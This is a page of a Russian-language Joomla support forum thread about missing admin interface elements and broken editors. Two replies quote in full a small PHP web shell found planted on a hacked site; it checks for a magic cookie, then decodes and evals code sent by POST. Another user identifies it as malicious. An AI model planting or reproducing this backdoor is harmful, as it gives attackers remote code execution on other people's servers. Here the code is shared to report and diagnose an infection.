Форум русской поддержки Joomla!® CMS
26.05.2017, 19:17:44 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: 1 [2]  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Пропали некоторые элементы интерфейса админки

 (Прочитано 14108 раз)
0 Пользователей и 1 Гость смотрят эту тему.
comax
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« : 23.11.2010, 18:54:28 »

Уважаемые коллеги.

В Админке в интерфейсе Установки, Выбора языка и в Общих нстройках пропали ссылки, чтобы выбирать раздел.
См. вложенные скриншоты.

Что может такое быть?

Записан
 
britanec
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #31 : 04.04.2013, 18:39:03 »

Не могу создать новый товар, отредактировать статьи, редактировать существующий товар. Смена редакторов не помогла.
Скрины:
Записан
Elektra
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 69



« Ответ #32 : 10.05.2013, 17:13:38 »

У меня утром все было нормально, а днем вот такая ерунда при добавлении материала, кэш чистила

Записан
kamit
Осваиваюсь на форуме
***

Репутация: +2/-0
Offline Offline

Пол: Мужской
Сообщений: 90


« Ответ #33 : 31.05.2013, 09:25:19 »

Заметил, что в различных папках Joomla на сервере появляются файлы с различными названиями.. например, 1797.php с содержанием:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

На остальных сайтах посмотрел.. не обнаружил такого.
Сомневаюсь, что появление подобных файлов - это норм явление.
Записан
drey.tee
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #34 : 23.08.2013, 18:39:59 »

Заметил, что в различных папках Joomla на сервере появляются файлы с различными названиями.. например, 1797.php с содержанием:
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Правильно сомневаетесь - это вредоносный код и надо чистить аккаунт,  если ещё актуально - обращайтесь к о мне.
Записан
drey.tee
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 3


« Ответ #35 : 23.08.2013, 18:41:13 »

У меня проблема такая же, как и у автора. - не тулбара (к тому же меню двоится).
В модулях mod_toolbar published = 1
Файлы Joomla 2.5.4 перезалил, всё равно кнопок сохранить, отменить и пр. нету.  Sad
В чём ещё проблема может крыться?
« Последнее редактирование: 23.08.2013, 19:22:21 от drey.tee » Записан
ChugaRay
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 4


« Ответ #36 : 10.01.2014, 16:02:07 »

В админ панели, при создании нового материала, пропал и не показывается вовсе визуальный редактор, только HTML верстка. Разделы, категории, названия материалов есть, а сам редактор исчез. Подскажите, что может произошло? С чем связанно? Как лечить?

p.s. был обнаружен sweb'ом вредоносный код, все вредные файлы удалил, но редактор так и не вернулся, что делать?
Записан
yevrowl
Давно я тут
****

Репутация: +10/-0
Offline Offline

Пол: Мужской
Сообщений: 245



« Ответ #37 : 10.01.2014, 17:45:40 »

но редактор так и не вернулся, что делать?

Рекомендую включить плагины всех доступных редакторов, и затем в панели управления через менеджер пользователей поочерёдно назначать принудительно текущему пользователю (администратору). Хоть один из доступных по идее должен работать.
Записан
draff
Практически профи
*******

Репутация: +169/-5
Offline Offline

Пол: Мужской
Сообщений: 2747


step by step


« Ответ #38 : 10.01.2014, 18:18:47 »

p.s. был обнаружен sweb'ом вредоносный код, все вредные файлы удалил, но редактор так и не вернулся, что делать?
перезалить /plugins/editors
А еще лучше- все файлы Joomla перезалить, кроме папки /installation
Записан
ChugaRay
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 4


« Ответ #39 : 14.01.2014, 09:32:37 »

Рекомендую включить плагины всех доступных редакторов, и затем в панели управления через менеджер пользователей поочерёдно назначать принудительно текущему пользователю (администратору). Хоть один из доступных по идее должен работать.

Пробовал, но не помогло. Удалил все редакторы принудительно, а затем поставил tiny и JCE, вроде заработало, но теперь когда материал добавлен, выхожу из админ панели, занимаюсь своими делами, захожу обратно и редактора снова нету Sad

Записан
ChugaRay
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 4


« Ответ #40 : 14.01.2014, 09:34:05 »

перезалить /plugins/editors
А еще лучше- все файлы Joomla перезалить, кроме папки /installation

я устанавливаю через панель управления Joomla
"перезалить" в смысле вырезать-вставить-вырезать-вставить?
Записан
egorovv
Осваиваюсь на форуме
***

Репутация: +0/-1
Offline Offline

Сообщений: 35


« Ответ #41 : 20.02.2014, 16:55:10 »

У меня такая -же проблема! Подскажите пожалуйста как выполнить этот запрос и в какой это таблице?
Записан
Elektra
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 69



« Ответ #42 : 03.11.2014, 19:15:27 »

up
Записан
Elektra
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 69



« Ответ #43 : 10.11.2014, 23:12:54 »

Не могу удалить расширения, в админке пропали некоторые кнопки Как вернуть?
Записан
SibUrsus
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 1


« Ответ #44 : 15.07.2016, 08:25:05 »

Добрый день!
Столкнулся с похожими проблемам как и многие спрашивающие здесь. Надеюсь, и я получу хороший совет.
Итак.
Платформа: Linux 3.14.51-grsec x86_64 at gen181.hs.shared.masterhost.ru
Версия MySQL: 5.6.28-1+wheezy1+mh2-log
Версия PHP: 5.3.29-1+mh1
Веб-сервер: Apache
Версия Joomla: Joomla! 1.5.26 Stable [ senu takaa ama busani ] 27-March-2012 18:00 GMT
Нуб: 1 шт :-)

История. Последние 2 года все работало стабильно, требований к сайту немного - чтоб он был и регулярно обновлялся.
Но 3 дня назад зачесалось мне добавить ролик с ютьюба. К моему удивлению, TinyMCE  молча послал меня.
Я наугулил плагин Allvideos. При попытке установить, получил ошибку. Скриншот к сожалению не сделал, что-то с правами на папки. Тут я вспомнил, что в 13 году сайтик наш постоянно заражали всякой дрянью и мы обращались за помощью на ревизиум.ком. Они вычистили пакость и приняли ряд мер по профилактике.
Тут мне бы плюнуть и отступить, но бес уже овладел моим здравым смыслом...
У меня там стоит плагин (или как правильно? компонент?) AdminTools и в нем есть кнопка Fix Permissions. Её я нажал. Оллвидеос установился, но радость моя была преждевременной. Теперь, при  попытке добавить материал я получил такое окно:


Попытки отключать-подключать редакторы успеха не имели.
Поняв что дров я все таки наломал, подал заявку хостеру на откат на 2-х дневный бэкап. (у мастерхост он платный, кстати, не так чтоб дорого но неприятно)
Однако и это не помогло! Редактор по прежнему отображался со сбитой кодировкой и не весь! на всех браузерах. Кэш чистил. Тогда попробовал установить JCE. Fail. Удалил JCE  и вдобавок ко всем прочим неприятностям, про логине в админку теперь вижу такое:


Прошу совета.


« Последнее редактирование: 15.07.2016, 08:32:40 от SibUrsus » Записан
Страниц: 1 [2]  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet